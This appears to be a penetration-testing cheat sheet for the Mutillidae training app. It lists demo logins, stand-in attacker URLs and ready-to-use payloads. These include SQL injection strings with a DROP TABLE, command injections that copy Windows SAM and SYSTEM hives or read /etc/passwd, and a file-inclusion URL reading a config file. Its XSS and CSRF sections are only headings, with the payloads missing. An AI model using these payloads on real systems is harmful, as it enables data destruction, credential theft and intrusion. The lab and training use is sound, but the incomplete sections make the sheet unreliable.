Accounts:
admin adminpass
adrian somepassword
john monkey
ed pentest

http://attacker.hak/mutillidae/caughtdata.txt
http://attacker.hak/mutillidae/pwnme.html
-----------------------------------------------------------------------------------
-----------------------------------------------------------------------------------
SQL Injection Strings:
'
'; DROP TABLE owasp10; --
' or 1=1 --
' + password --

Command Injection Strings (Windows):
&& dir
&& wmic process list
&& wmic useraccount list
&& copy c:\WINDOWS\repair\sam
&& copy c:\WINDOWS\repair\system.bak
&& copy C:\Windows\System32\config\RegBack\sam.old
&& copy C:\Windows\System32\config\RegBack\SYSTEM.OLD

Command Injections (for *nix):
;whoami
;cat /etc/passwd
;nmap -A target.hak
-----------------------------------------------------------------------------------
-----------------------------------------------------------------------------------
Simple XSS:

Page Redirect XSS:

Cookie Stealing:

Password Con XSS:

More complicated, but better looking XSS password form:
You must login to continue
User:
Password:

Clippy XSS:
Hello, it looks like you have an XSS vulnerability, would you like some help fixing that?
External Javascript:

Hot BeEF Injection:

User Agent Example:
-----------------------------------------------------------------------------------
-----------------------------------------------------------------------------------
File includes:
at source viewer:
http://target.hak/mutillidae/index.php?page=source-viewer.php&php_file_name=config.inc
-----------------------------------------------------------------------------------
-----------------------------------------------------------------------------------
CSRF/XSRF Examples:

IMG get:

IFRAME Get:

Post method:

The Post:

The HTML